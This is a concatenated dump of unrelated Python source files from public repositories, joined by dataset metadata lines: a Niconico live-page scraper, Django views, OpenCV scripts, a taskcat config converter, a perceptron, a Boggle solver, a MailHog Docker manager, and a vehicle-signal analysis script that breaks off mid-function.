FetchNicoliveWatchUnknownResult:\n result_type: Literal['unknown']\n\n\nFetchNicoliveWatchResult = Union[\n FetchNicoliveWatchSuccessHtmlResult,\n FetchNicoliveWatchInvalidLiveIdOrUrlResult,\n FetchNicoliveWatchNotFoundResult,\n FetchNicoliveWatchMaintenanceResult,\n FetchNicoliveWatchUnknownResult,\n]\n\n\ndef validate_live_id(live_id: str) -> bool:\n live_id_patterns = [\n r'lv\\d+',\n r'user\\/\\d+',\n r'co\\d+',\n r'ch\\d+',\n ]\n\n for pattern in live_id_patterns:\n if re.fullmatch(pattern, live_id):\n return True\n\n return False\n\n\ndef validate_live_url_and_get_safe_live_id(live_url: str) -> Optional[str]:\n urlp = urlparse(live_url)\n\n if urlp.scheme == 'https' and \\\n urlp.hostname == 'live.nicovideo.jp' and \\\n urlp.path.startswith('/watch/'):\n live_id = urlp.path[7:] # cut \"/watch/\"\n if validate_live_id(live_id=live_id):\n return live_id\n\n return None\n\n\ndef fetch_nicolive_watch(\n live_id_or_url: str,\n useragent: str,\n) -> FetchNicoliveWatchResult:\n # validate live_id\n safe_live_id = None\n\n is_live_id = False\n if validate_live_id(live_id=live_id_or_url):\n is_live_id = True\n safe_live_id = live_id_or_url\n\n is_live_url = False\n if not is_live_id:\n result = validate_live_url_and_get_safe_live_id(live_url=live_id_or_url)\n if result is not None:\n is_live_url = True\n safe_live_id = result\n\n if not is_live_id and not is_live_url:\n return FetchNicoliveWatchInvalidLiveIdOrUrlResult(\n result_type='invalid_live_id_or_url',\n )\n\n assert safe_live_id is not None\n\n headers = {\n 'User-Agent': useragent,\n }\n\n res = requests.get(\n f'https://live.nicovideo.jp/watch/{safe_live_id}',\n headers=headers,\n )\n status_code = res.status_code\n if status_code == 200:\n html = res.text\n\n return FetchNicoliveWatchSuccessHtmlResult(\n result_type='success',\n data_type='html',\n data=FetchNicoliveWatchSuccessHtmlData(\n html=html,\n ),\n )\n\n elif status_code == 404:\n return FetchNicoliveWatchNotFoundResult(\n result_type='not_found',\n )\n\n elif status_code == 500:\n return FetchNicoliveWatchMaintenanceResult(\n result_type='maintenance',\n )\n\n return FetchNicoliveWatchUnknownResult(\n result_type='unknown',\n )\n\n\n\"\"\"\n Private API: Parse a live url in a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlSuccessOgpData:\n url: Optional[str]\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlSuccessOgpResult:\n result_type: Literal['success']\n data_type: Literal['ogp']\n data: ParseOgpInNicoliveWatchHtmlSuccessOgpData\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nParseOgpInNicoliveWatchHtmlResult = Union[\n ParseOgpInNicoliveWatchHtmlSuccessOgpResult,\n ParseOgpInNicoliveWatchHtmlUnknownErrorResult,\n]\n\n\ndef parse_ogp_in_nicolive_watch_html(\n html: str,\n) -> ParseOgpInNicoliveWatchHtmlResult:\n bs = BeautifulSoup(html, 'html5lib')\n\n og_url_tag = bs.find('meta', attrs={'property': 'og:url', 'content': True})\n url = og_url_tag['content'] if isinstance(og_url_tag, Tag) else None\n if isinstance(url, list):\n url = url[0]\n\n return ParseOgpInNicoliveWatchHtmlSuccessOgpResult(\n result_type='success',\n data_type='ogp',\n data=ParseOgpInNicoliveWatchHtmlSuccessOgpData(\n url=url,\n ),\n )\n\n\n\"\"\"\n Private API: Parse a json-ld in a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData:\n name: Optional[str]\n description: Optional[str]\n thumbnail_url: Optional[List[str]]\n start_date: Optional[str] # ISO8601 timezone-aware datetime string\n end_date: Optional[str] # ISO8601 timezone-aware datetime string\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult:\n result_type: Literal['success']\n data_type: Literal['json_ld']\n data: ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nParseJsonLdInNicoliveWatchHtmlResult = Union[\n ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult,\n ParseJsonLdInNicoliveWatchHtmlNotFoundResult,\n ParseJsonLdInNicoliveWatchHtmlUnknownErrorResult,\n]\n\n\ndef parse_json_ld_in_nicolive_watch_html(\n html: str,\n) -> ParseJsonLdInNicoliveWatchHtmlResult:\n bs = BeautifulSoup(html, 'html5lib')\n\n json_ld_tag = bs.find('script', attrs={'type': 'application/ld+json'})\n if not isinstance(json_ld_tag, Tag):\n return ParseJsonLdInNicoliveWatchHtmlNotFoundResult(\n result_type='not_found',\n )\n\n json_ld_text = json_ld_tag.string\n if json_ld_text is None:\n return ParseJsonLdInNicoliveWatchHtmlNotFoundResult(\n result_type='not_found',\n )\n\n json_ld_data = json.loads(json_ld_text)\n\n name = json_ld_data.get('name')\n description = json_ld_data.get('description')\n thumbnail_url = json_ld_data.get('thumbnailUrl', [])\n\n publication = json_ld_data.get('publication', {})\n\n # start_date, end_date\n # ISO8601 timezone-aware datetime string\n start_date = publication.get('startDate')\n end_date = publication.get('endDate')\n\n return ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult(\n result_type='success',\n data_type='json_ld',\n data=ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData(\n name=name,\n description=description,\n thumbnail_url=thumbnail_url,\n start_date=start_date,\n end_date=end_date,\n )\n )\n","repo_name":"aoirint/liveinfopy","sub_path":"liveinfo/nicolive.py","file_name":"nicolive.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20346606680","text":"from first.models import *\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.views import View\n\ndef clause_list(request):\n clauses = Clause.objects.all()\n lst = []\n for i in clauses:\n current = {\n 'PK': i.pk,\n 'ID': i.ID,\n 'Text': i.text,\n 'Sentence_ID': i.sentence_ID,\n 'Frame_ID': i.frame_ID\n }\n lst.append(current)\n return render(request, 'first/clauses/clauses.html', {'context': lst})\n\ndef clause_add(request):\n url = \"clauses\"\n choice = Sentence.objects.all()\n arr = []\n print(request.POST)\n for item in choice:\n var = {\n 'id': item.pk,\n 'value': item\n }\n arr.append(var)\n \n number = 0\n if request.POST.get('doc_select'):\n var = request.POST.get('doc_select')\n number = var[7] + var[8]\n\n \n for sentence in Sentence.objects.all():\n if sentence.pk == int(number):\n print(request.POST)\n clause = Clause(\n #Choice Menu\n ID = sentence,\n text = request.POST.get('text'),\n sentence_ID = sentence,\n frame_ID = request.POST.get('frame_id')\n )\n clause.save()\n return redirect(url)\n return render(request, 'first/clauses/clause_add_ajax.html', {'context': url, 'choices': arr})\n\ndef clause_change(request, detail_view_id):\n url = 'clauses/' + str(detail_view_id)\n clause = Clause.objects.get(pk=detail_view_id)\n #######\n choice = Sentence.objects.all()\n arr = []\n for item in choice:\n var = {\n 'id': item.pk,\n 'value': item\n }\n arr.append(var)\n \n number = 0\n if request.POST.get('document_id'):\n var = request.POST.get('document_id')\n number = var[7] + var[8]\n #######\n\n\n if request.POST.get('action') == 'Delete':\n clause.delete()\n return redirect('clauses')\n \n\n if request.POST.get('action') == 'Save':\n for sentence in Sentence.objects.all():\n if sentence.pk == int(number):\n print(request.POST)\n clause = Clause(\n #Choice Menu\n ID = sentence,\n text = request.POST.get('text'),\n sentence_ID = sentence,\n frame_ID = request.POST.get('frame_id')\n )\n clause.save()\n return redirect(url)\n\n clause = Clause.objects.get(pk=detail_view_id)\n current = {\n 'Type': 'Клауза',\n 'sentence_id': clause.ID,\n 'text': clause.text,\n 'frame_id': clause.frame_ID,\n \n }\n\n return render(request, 'first/clauses/clause_change_ajax.html', {'context': current, 'choices': arr})\n\ndef clause_view(request, detail_view_id):\n url = 'clauses/' + str(detail_view_id)\n clause = Clause.objects.get(pk=detail_view_id)\n ##############################\n choice = Sentence.objects.all()\n arr = []\n for item in choice:\n var = {\n 'id': item.pk,\n 'value': item\n }\n arr.append(var)\n ###########################\n current = {\n 'Type': 'Клауза',\n 'sentence_id': clause.ID,\n 'text': clause.text,\n 'frame_id': clause.frame_ID,\n \n #Document ID ??\n }\n if request.POST.get('action') == 'Delete':\n clause.delete()\n return redirect('/apps/first/clauses')\n elif request.POST.get('action') == 'Edit':\n return redirect(url + '/change')\n return render(request, 'first/clauses/clause_view_ajax.html', {'context': current, 'choices': arr, 'url': url})","repo_name":"useribraim/django","sub_path":"first/views/clauses.py","file_name":"clauses.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17927468222","text":"import cv2\nimport numpy as np\nimport os\n\nTEST_DIR='/media/bernal-tensor/Video_4_Paul/520_1140_process'\nimg=[]\nos.chdir(TEST_DIR) \njpgs = [x for x in os.listdir(TEST_DIR) if x.endswith('.jpg')]\njpgs.sort()\nprint('jpgs[1]:i{}'.format(jpgs[0]))\nsample = cv2.imread(jpgs[1])\n\nheight,width,layers=sample.shape\n\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nwriter=cv2.VideoWriter('517_1150.mp4',fourcc,30.0,(width,height))\n\nfor jpg in jpgs:\n writer.write(cv2.imread(jpg))\n\ncv2.destroyAllWindows()\nwriter.release()\n","repo_name":"pauldevine/keras-yolo3","sub_path":"stich_images.py","file_name":"stich_images.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"2781345215","text":"import cv2\nimport numpy as np\n\nimg=cv2.imread('../cao2.png')\n\nkernel1 = np.ones((3, 3), np.uint8)\nkernel2 = np.ones((3, 3), np.uint8)\n\nimgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n# imgBW=cv2.threshold(imgGray, 0, 255, cv2.THRESH_BINARY_INV)[1]\nimgBW= cv2.Canny(imgGray, 100, 150)\ncv2.imwrite('trial4_otsu.png', imgBW)\n\nimg1=cv2.erode(imgBW, kernel1, iterations=2)\nimg2=cv2.dilate(img1, kernel2, iterations=2)\nimg3 = cv2.bitwise_and(imgBW, img2)\nimg3= cv2.bitwise_not(img3)\nimg4 = cv2.bitwise_and(imgBW, imgBW, mask=img3)\nimgLines= cv2.HoughLinesP(img4, 15, np.pi/180, 10, minLineLength=2, maxLineGap=5)\n\nfor i in range(len(imgLines)):\n for x1,y1,x2,y2 in imgLines[i]:\n cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)\n\n\ncv2.imwrite('trial4.png', img)\n","repo_name":"chacoff/preOCR","sub_path":"trial/trial4.py","file_name":"trial4.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16744043077","text":"import logging\nfrom dataclasses import dataclass, field\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport yaml\n\nfrom dataclasses_jsonschema import JsonSchemaMixin\nfrom taskcat._dataclasses import BaseConfig\nfrom taskcat.exceptions import TaskCatException\n\nLOG = logging.getLogger(__name__)\n\n\n@dataclass\nclass LegacyGlobalConfig(JsonSchemaMixin):\n qsname: str\n govcloud: bool = field(default=False)\n marketplace_ami: bool = field(default=False)\n owner: str = field(default=\"\")\n regions: List[str] = field(default_factory=list)\n reporting: bool = field(default=True)\n lambda_build: bool = field(default=False)\n s3bucket: str = field(default=\"\")\n\n\n@dataclass\nclass LegacyTestConfig(JsonSchemaMixin):\n template_file: str\n parameter_input: str\n regions: List[str] = field(default_factory=list)\n\n\n@dataclass\nclass LegacyConfig(JsonSchemaMixin):\n global_: LegacyGlobalConfig\n tests: Dict[str, LegacyTestConfig]\n\n\ndef parse_legacy_config(project_root: Path):\n config_file = (project_root / \"ci/taskcat.yml\").expanduser().resolve()\n if not config_file.is_file():\n raise TaskCatException(f\"No config_file at {config_file}\")\n with open(str(config_file), \"r\", encoding=\"utf-8\") as file_handle:\n config_dict = yaml.safe_load(file_handle)\n # need to rename global key, as it's a python keyword\n config_dict[\"global_\"] = config_dict.pop(\"global\")\n legacy_config = LegacyConfig.from_dict(config_dict)\n tests = {}\n for test_name, test_data in legacy_config.tests.items():\n parameters = {}\n parameter_file = project_root / \"ci/\" / test_data.parameter_input\n parameter_file = parameter_file.expanduser().resolve()\n with open(str(parameter_file), \"r\", encoding=\"utf-8\") as file_handle:\n for param in yaml.safe_load(file_handle):\n parameters[param[\"ParameterKey\"]] = param[\"ParameterValue\"]\n tests[test_name] = {\n \"template\": \"templates/\" + test_data.template_file,\n \"parameters\": parameters,\n \"regions\": test_data.regions,\n }\n if not tests[test_name][\"regions\"]:\n del tests[test_name][\"regions\"]\n new_config_dict = {\n \"project\": {\n \"name\": legacy_config.global_.qsname,\n \"owner\": legacy_config.global_.owner,\n \"s3_bucket\": legacy_config.global_.s3bucket,\n \"package_lambda\": legacy_config.global_.lambda_build,\n \"regions\": legacy_config.global_.regions,\n },\n \"tests\": tests,\n }\n new_config = BaseConfig.from_dict(new_config_dict)\n LOG.warning(\n \"config is in a legacy format, support for which will be dropped in a \"\n \"future version. a new format config (.taskcat.yml) will been placed \"\n \"in your project_root\"\n )\n new_config_path = project_root / \".taskcat.yml\"\n if new_config_path.exists():\n LOG.warning(\n f\"skipping new config file creation, file already exits at \"\n f\"{new_config_path}\"\n )\n else:\n with open(str(new_config_path), \"w\", encoding=\"utf-8\") as file_handle:\n config_dict = new_config.to_dict()\n config_dict.pop(\"general\")\n yaml.dump(config_dict, file_handle, default_flow_style=False)\n return new_config\n\n\ndef legacy_overrides(legacy_override, overrides_path, override_type):\n if legacy_override.is_file():\n with open(str(legacy_override), \"r\", encoding=\"utf-8\") as file_handle:\n override_params = yaml.safe_load(file_handle)\n LOG.warning(\n f\"overrides file {str(legacy_override)} is in legacy \"\n f\"format, support for this format will be deprecated \"\n f\"in a future version.\"\n )\n override_params = {\n i[\"ParameterKey\"]: i[\"ParameterValue\"] for i in override_params\n }\n if override_type == \"global\":\n override_params = {\"general\": {\"parameters\": override_params}}\n if not overrides_path.exists():\n LOG.warning(\n f\"Converting overrides to new format and saving in \" f\"{overrides_path}\"\n )\n with open(str(overrides_path), \"w\", encoding=\"utf-8\") as file_handle:\n file_handle.write(yaml.dump(override_params, default_flow_style=False))\n else:\n LOG.warning(\n f\"Ignoring legacy overrides as a current format \"\n f\"file has been found in {str(overrides_path)}\"\n )\n","repo_name":"aws-ia/taskcat","sub_path":"taskcat/_legacy_config.py","file_name":"_legacy_config.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"} +{"seq_id":"16410068909","text":"from turtle import Turtle\r\n\r\n\r\nclass Scoreboard(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.color(\"white\")\r\n self.penup()\r\n self.hideturtle()\r\n self.p1_score = 0\r\n self.p2_score = 0\r\n self.score_recorder()\r\n\r\n def score_recorder(self):\r\n self.goto(-100, 190)\r\n self.write(arg=self.p2_score, align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n self.goto(100, 190)\r\n self.write(arg=self.p1_score, align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n\r\n def p1_total_score(self):\r\n self.p1_score += 1\r\n self.clear()\r\n self.score_recorder()\r\n\r\n def p2_total_score(self):\r\n self.p2_score += 1\r\n self.clear()\r\n self.score_recorder()\r\n\r\n def game_over(self):\r\n self.goto(0, 0)\r\n self.write(\"Game Over!\", align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n","repo_name":"dennis-no-bug/pong-with-friends","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72976975787","text":"import numpy as np\n\n\n'''\nUpdates the weights and bias\nParameters:\n\tweights -> 1D np.array of the current weights\n\tbias -> int of current bias\n\tX -> 1D np.array of teh current sample\n\tY -> 1D np.array of current sample label\nReturns:\n\tCluster Centers -> sorted np.array\n'''\ndef updateWB(weights,bias,X,Y):\n\t\n\tnew_weights = weights + (X*Y)\n\n\tnew_bias = bias + Y\n\n\n\treturn [new_weights, new_bias]\n\n'''\nReturns the weights and bias for a perceptron\nParameters:\n\tX -> np.array of training data\n\tY -> np.array of the training data labels\nReturns:\n\tweights and bias -> List of two elements, the first being the weights and the second being the bias\n'''\ndef perceptron_train(X,Y):\n\n\t'''\n\tstart weights and bias at 0\n\tgo through one epoch at a time until previous w and b is equal to current w and b\n\t\teach iteration through sample, update if y not equal to prediction\n\t'''\n\t\n\t#Initalize weights and bias to 0\n\tweights = np.zeros(np.size(X,1))\n\tbias = 0\n\n\t#Boolean to keep track of whether the weights and bias have been updated on the most current epoch\n\tupdated = True\n\n\t#run while the weights and bias have been updated\n\twhile (updated):\n\n\t\t#Resets updated to False\n\t\tupdated = False\n\t\n\t\t#Iterate through all of the samples\n\t\tfor sample_index in range(len(X)):\n\n\n\t\t\t#Find the activation for each sample\n\t\t\tactivation = np.sum(weights * X[sample_index,:]) + bias\n\n\t\t\t\n\t\t\t#If the activation is incorrect, update\n\t\t\tif((activation * Y[sample_index,0]) <= 0):\n\n\t\t\t\tweights_bias = updateWB(weights, bias,X[sample_index,:],Y[sample_index])\n\t\t\t\tweights = weights_bias[0]\n\t\t\t\tbias = weights_bias[1]\n\n\t\t\t\t#Changes update to True\n\t\t\t\tupdated = True\n\n\n\treturn weights, bias\n\n\n'''\nReturns the weights and bias for a perceptron\nParameters:\n\tX_test -> np.array of testing data\n\tY_test -> np.array of the testing data labels\n\tw -> 1D np.array of the weights\n\tb -> integer bias\nReturns:\n\tweights and bias -> List of two elements, the first being the weights and the second being the bias\n'''\ndef perceptron_test(X_test, Y_test, w, b):\n\n\n\t#Initalizes the count_correct to 0\n\tcount_correct = 0\n\n\t#Iterates through all of the testing samples\n\tfor sample_index in range(len(X_test)):\n\n\t\t#Calculates the activation for each sample\n\t\tactivation = np.sum(w * X_test[sample_index,:]) + b\n\n\n\t\t#If the activation is correct (activation * label is positive) increment count_correct\n\t\tif (activation * Y_test[sample_index,0] > 0):\n\n\t\t\tcount_correct += 1\n\n\t#Return the count correct divided by the number of samples\n\treturn(count_correct/len(X_test))\n\n","repo_name":"jhosea/CS491_Project2","sub_path":"hosea_talavera_project2/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35419265785","text":"import random\nfrom collections import namedtuple\nfrom populate import sqlite3, DB, LETTERS\n\nCUBES = (\n list(\"rulwig\"),\n [\"qu\"] + list(\"jobam\"),\n list(\"ivgetn\"),\n list(\"yelguk\"),\n list(\"zadven\"),\n list(\"yifeeh\"),\n list(\"dacpem\"),\n list(\"todkun\"),\n list(\"newsod\"),\n list(\"smahor\"),\n list(\"siphen\"),\n list(\"putles\"),\n list(\"tilbay\"),\n list(\"lascre\"),\n list(\"coitaa\"),\n list(\"xirfob\"),\n)\n\nclass Boggle:\n\n def __init__(self):\n indexes = list(range(16))\n random.shuffle(indexes)\n self.board = [[random.choice(CUBES[indexes.pop(0)]) for _ in range(4)] for _ in range(4)] #naive board\n \n def show(self):\n def pad(r):\n if len(r) == 1:\n return r + \"\"\n return r\n print(\"--\")\n print(\"\\n\".join(\" \".join(pad(r)) for r in self.board))\n print(\"--\")\n \n def paths(self):\n DIRS = (\n (1, 0),\n (-1, 0),\n (0, 1),\n (0, -1), #^STRAIGHTS \\/ DIAGONALS\n (-1, 1),\n (1, -1),\n (1, 1),\n (-1, -1),\n )\n Node = namedtuple(\"Node\", [\"coords\", \"character\", \"parent\", \"path\"])\n size = 4\n seen = set()\n for y, row in enumerate(self.board):\n for x, character in enumerate(row):\n queue = []\n queue.append(Node((x, y), character, None, []))\n while queue:\n node = queue.pop(0)\n if len(node.path) > 5:\n break\n for dx, dy in DIRS:\n child_coords = (node.coords[0]+dx, node.coords[1]+dy)\n if child_coords[0] < 0 or child_coords[0] >= size or child_coords[1] < 0 or child_coords[1] >= size:\n continue\n if child_coords not in node.path:\n child = Node(child_coords, self.board[child_coords[1]][child_coords[0]], node, node.path + [node.coords])\n queue.append(child)\n word = \"\"\n while child:\n word = child.character + word\n child = child.parent\n if word not in seen:\n seen.add(word)\n yield word\n\n def words(self):\n conn = sqlite3.connect(DB)\n c = conn.cursor()\n for path in self.paths():\n c.execute(\"SELECT value FROM commonwords WHERE value = ?\", (path,))\n fetch = c.fetchone()\n if fetch:\n yield fetch[0]\n conn.commit()\n conn.close()\n\ndef test_average():\n num_words_observed = []\n for _ in range(100):\n b = Boggle()\n b.show()\n num_words = len(list(b.words()))\n print(f\"Has {num_words} words\")\n num_words_observed.append(num_words)\n print(f\"Average: {sum(num_words_observed) / len(num_words_observed)}\")\n\nif __name__ == \"__main__\":\n b = Boggle()\n b.show()\n print(\"Loading words...\")\n words = set(b.words())\n print(f\"Found {len(words)} words.\")\n #print(\", \".join(words))\n guessed = set()\n correct_guesses = set()\n while True:\n b.show()\n print(\"You've gotten: {}\".format(\", \".join(correct_guesses)))\n print(\"{} remaining.\".format(len(words) - len(correct_guesses)))\n guess = input(\"Enter a word: \")\n if guess in guessed:\n print(\"Already guessed that word.\")\n elif guess in words:\n guessed.add(guess)\n correct_guesses.add(guess)\n print(\"Got it!\")\n else:\n guessed.add(guess)\n print(\"Not a word.\")\n","repo_name":"jeromew21/boggle-solver","sub_path":"boggle.py","file_name":"boggle.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15149924800","text":"from flask import Flask\nfrom flask import request\nfrom gevent.pywsgi import WSGIServer\nimport os\nimport docker\nimport json\n\nversion = str(os.environ['VERSION'])\ndomain = str(os.environ['DOMAIN'])\n\napp = Flask(__name__)\n\nclient = docker.from_env()\n\ndef list_mailhog_containers():\n return client.containers.list(filters={\"label\":\"mailhog.name\"});\n\ndef find_container(name):\n containers = list_mailhog_containers()\n return list(filter(lambda x: x.labels['mailhog.name'] == name, containers))\n\ndef get_public_port(container, port):\n return container.attrs['NetworkSettings']['Ports'][port][0]['HostPort']\n\ndef container_to_dto(c):\n return {\n \"name\": c.labels['mailhog.name'], \n \"smtp\": domain + \":\" + get_public_port(c, '1025/tcp'),\n \"ui\": \"http://\" + domain + \":\" + get_public_port(c, '8025/tcp')\n }\n\n@app.route(\"/\")\ndef root():\n return app.send_static_file('index.html')\n\n@app.route(\"/api/healthCheck\")\ndef health_check():\n return \"{\\\"success\\\":true,\\\"version\\\":\\\"\" + version + \"\\\"}\\n\"\n\n@app.route(\"/api/list\")\ndef list_containers():\n containers = list_mailhog_containers()\n container_list = list(map(container_to_dto, containers))\n return json.dumps(container_list)\n\n@app.route(\"/api/create/\", methods=['POST'])\ndef create(name):\n container_find = find_container(name)\n if container_find:\n return \"{\\\"error\\\":\\\"\" + name + \" is already used\\\"}\", 400\n else:\n client.containers.run(image=\"mailhog/mailhog\", detach=True, labels={\"mailhog.name\":name}, publish_all_ports=True)\n return \"{}\"\n\n@app.route(\"/api/delete/\", methods=['POST'])\ndef delete(name):\n container_find = find_container(name)\n if not container_find:\n return \"{\\\"error\\\":\\\"\" + name + \" is not found\\\"}\", 404\n else:\n client.containers.get(container_find[0].id).remove(force=True)\n return \"{}\"\n\nif __name__ == \"__main__\":\n http_server = WSGIServer(('', 5000), app)\n http_server.serve_forever()\n","repo_name":"Ksisu/mailhog-mgr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30203869644","text":"import numpy as np\nimport pandas as pd\nimport dataframe_image as dfi\nimport ansiglist\nimport collections, numpy\n\n'''\n1. Shift Gear 체결빈도\n2. Select Direction 체결빈도\n - Odd H/L\n - Even H/L\n3. MCU Temp 그래프 / Max 온도 / 평균 온도 : iom_Mcu_MotTemp_C\n4. Slope 그래프 : Slope\n/5. CPU Load 분포 / Max CPU Load : Os_GusCPULoad_[0]/[1]/[2]\n6. Brake On/Off 비율 : BrakeSwitchLocal\n7. 전체 주행 시간\n8. 전체 주행 거리(odometer) : iom_Clu_Odometer\n9. Clutch Drive Gear Shift 횟수 및 Control Time 비율 : csm_DrivingGear\n10. Clutch Shift 횟수 (삭제) Clutch Motor Turn On Count Count\n/11. Clutch Motor Turn On Contol Time\n12. 고도(height) Min / Max / Mean : ALTITUDE\n13. 외기온 평균 값 : CR_Fatc_OutTemp\n14. APS 비율 : APS\n15. 차속 비율 : iom_VSP16\n'''\n\ndef run(AnalySig):\n ''' 15. 차속비율 '''\n vehicle_speed_interval = pd.cut(AnalySig['iom_VSP16'],[0,30,50,70,90,120,180], right=False, include_lowest=True,precision=2) # 1번인자 : 배열 / 2번인자 : 구간 / right : < A << / inclue_lowest = True 최소 값 포함 여부\n Analy_15 = AnalySig['iom_VSP16'].groupby([vehicle_speed_interval]).count()*0.01\n Analy_15['Driving Total Time'] = AnalySig['iom_VSP16'].count()*0.01\n print(Analy_15)\n\n ''' 14. APS 비율 (0을 제외)'''\n APS_interval = pd.cut(AnalySig['APS'],[0,10,20,30,40,50,70,100], right=True, include_lowest=False,precision=2) # 1번인자 : 배열 / 2번인자 : 구간 / right : < A << / inclue_lowest = True 최소 값 포함 여부\n Analy_14 = AnalySig['APS'].groupby([APS_interval]).count()*0.01\n print(Analy_14)\n\n ''' 13. 외기온 평균 '''\n Analy_13 = AnalySig['CR_Fatc_OutTemp'].mean()\n Analy_13 = pd.DataFrame([Analy_13],index=['outside air temp.'])\n print(Analy_13)\n\n ''' 12. 고도(height) Min / Max / Mean : ALTITUDE '''\n height_min = AnalySig['ALTITUDE'].min()\n height_max = AnalySig['ALTITUDE'].max()\n height_mean = AnalySig['ALTITUDE'].mean()\n Analy_12 = pd.Series([height_min,height_max,height_mean],index=['height_min','height_max','height_mean'])\n print(Analy_12)\n\n ''' 10. Clutch Shift 횟수 : csm_DrivingGear '''\n clutch_Shift_gear_change = []\n i=0\n while i < len(AnalySig['csm_DrivingGear'])-1:\n if i==0:\n clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i])\n if AnalySig['csm_DrivingGear'][i+1] != AnalySig['csm_DrivingGear'][i]:\n if AnalySig['csm_DrivingGear'][i] == 'g1'or AnalySig['csm_DrivingGear'][i] == 'g3'or AnalySig['csm_DrivingGear'][i] =='g5':\n if AnalySig['csm_DrivingGear'][i+1] == 'g2'or AnalySig['csm_DrivingGear'][i+1] == 'g4'or AnalySig['csm_DrivingGear'][i+1] =='g6':\n clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n if AnalySig['csm_DrivingGear'][i] == 'g2'or AnalySig['csm_DrivingGear'][i] == 'g4'or AnalySig['csm_DrivingGear'][i] =='g6':\n if AnalySig['csm_DrivingGear'][i+1] == 'g1'or AnalySig['csm_DrivingGear'][i+1] == 'g3'or AnalySig['csm_DrivingGear'][i+1] =='g5':\n clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n i+=1\n\n clutch_Shift_gear_change = pd.DataFrame(clutch_Shift_gear_change,columns=['clutch_Shift_gear_change'])\n odd_clutch_Shift_count = clutch_Shift_gear_change[(clutch_Shift_gear_change['clutch_Shift_gear_change']=='g1')|\n (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g3')|\n (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g5')].count()\n\n even_clutch_Shift_count = clutch_Shift_gear_change[(clutch_Shift_gear_change['clutch_Shift_gear_change']=='g2')|\n (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g4')|\n (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g6')].count()\n\n Analy_10 = pd.Series([odd_clutch_Shift_count['clutch_Shift_gear_change'],even_clutch_Shift_count['clutch_Shift_gear_change']],index=['odd_clutch_Shift_count','even_clutch_Shift_count'])\n Analy_10['clutch_shift_count'] = len(clutch_Shift_gear_change)\n print(Analy_10)\n\n ''' 9. Clutch Drive Gear Shift 횟수 및 Control Time 비율 : csm_DrivingGear '''\n ''''9-1 Clutch Drive gear별 Shift 횟수 '''\n clutch_Shift_gear_change = []\n i=0\n while i < len(AnalySig['csm_DrivingGear'])-1:\n if i==0:\n clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i])\n if AnalySig['csm_DrivingGear'][i+1] != AnalySig['csm_DrivingGear'][i]:\n clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n i+=1\n\n clutch_each_gear_count = collections.Counter(clutch_Shift_gear_change)\n clutch_each_gear_count = pd.DataFrame.from_dict([clutch_each_gear_count]).T\n clutch_each_gear_count.sort_index(inplace=True)\n clutch_each_gear_count.columns=['clutch_each_gear_count']\n\n ''' 9-2 Clutch Control Time 비율 '''\n clutch_each_gear_ContTime = collections.Counter(AnalySig['csm_DrivingGear'])\n clutch_each_gear_ContTime = pd.DataFrame.from_dict([clutch_each_gear_ContTime]).T\n clutch_each_gear_ContTime.sort_index(inplace=True)\n clutch_each_gear_ContTime=clutch_each_gear_ContTime*0.01\n 